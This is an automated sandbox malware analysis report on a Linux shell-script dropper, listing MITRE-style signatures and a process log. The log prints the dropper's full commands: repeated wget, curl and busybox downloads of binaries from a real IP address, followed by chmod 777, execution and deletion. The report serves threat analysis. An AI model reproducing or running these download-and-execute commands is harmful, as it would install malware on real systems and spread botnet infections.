Malware Analysis Report

2025-04-03 19:38

Sample ID 241029-bdejva1hrj
Target 238ce56c9ddc1a35bd7134b8f1950471.bin
SHA256 ae4cce441a4ee9a32ef001e961dc3cd39be6fffb0e3e6ceb2c22d37836963f0c
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

ae4cce441a4ee9a32ef001e961dc3cd39be6fffb0e3e6ceb2c22d37836963f0c

Threat Level: Shows suspicious behavior

The file 238ce56c9ddc1a35bd7134b8f1950471.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-29 01:01

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-29 01:01

Reported

2024-10-29 01:04

Platform

debian9-mipsel-20240611-en

Max time kernel

79s

Max time network

81s

Command Line

[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ N/A
N/A /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 N/A
N/A /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP N/A
N/A /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM N/A
N/A /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 N/A
N/A /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W N/A
N/A /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p N/A
N/A /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm N/A
N/A /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 N/A
N/A /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU N/A
N/A /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf N/A
N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm N/A
N/A /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX N/A
N/A /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W N/A
N/A /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 N/A
N/A /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm N/A
N/A /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 N/A
N/A /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU N/A
N/A /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf N/A
N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p N/A
N/A /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX N/A
N/A /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm N/A
N/A /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 N/A
N/A /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP N/A
N/A /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM N/A
N/A /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /usr/bin/curl N/A
File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /usr/bin/curl N/A
File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /usr/bin/curl N/A
File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /usr/bin/curl N/A
File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /usr/bin/curl N/A
File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /usr/bin/curl N/A
File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /usr/bin/curl N/A
File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /usr/bin/curl N/A
File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /usr/bin/curl N/A
File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /usr/bin/curl N/A
File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /usr/bin/curl N/A
File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /usr/bin/curl N/A
File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /usr/bin/curl N/A
File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /usr/bin/curl N/A
File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /usr/bin/curl N/A
File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /usr/bin/curl N/A
File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /usr/bin/curl N/A
File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /usr/bin/curl N/A
File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /usr/bin/curl N/A
File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /usr/bin/curl N/A
File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /usr/bin/curl N/A
File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /usr/bin/curl N/A
File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /usr/bin/curl N/A
File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /usr/bin/curl N/A
File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /usr/bin/curl N/A
File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /usr/bin/curl N/A
File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /usr/bin/curl N/A
File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /usr/bin/curl N/A

Processes

/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh

[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/chmod

[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/rm

[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/wget

[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/chmod

[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7

[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/rm

[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/wget

[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/chmod

[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP

[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/rm

[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/wget

[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/chmod

[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM

[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/rm

[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/wget

[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/chmod

[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9

[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/rm

[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/wget

[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/chmod

[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W

[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/rm

[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/wget

[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/chmod

[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p

[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/rm

[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/wget

[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/chmod

[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm

[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/rm

[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/wget

[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/chmod

[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5

[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/rm

[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/wget

[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/chmod

[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU

[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/rm

[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/wget

[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/chmod

[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf

[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/rm

[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/wget

[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/chmod

[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/rm

[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/wget

[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/chmod

[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm

[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/rm

[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/wget

[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/chmod

[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX

[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/rm

[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/wget

[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/chmod

[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W

[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/rm

[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/wget

[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/chmod

[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9

[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/rm

[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/wget

[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/chmod

[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm

[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/rm

[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/wget

[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/chmod

[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5

[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/rm

[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/wget

[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/chmod

[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU

[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/rm

[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/wget

[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/chmod

[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf

[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/rm

[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/wget

[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/chmod

[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/rm

[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/wget

[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/chmod

[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p

[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/rm

[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/wget

[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/chmod

[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX

[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/rm

[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/wget

[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/chmod

[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm

[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

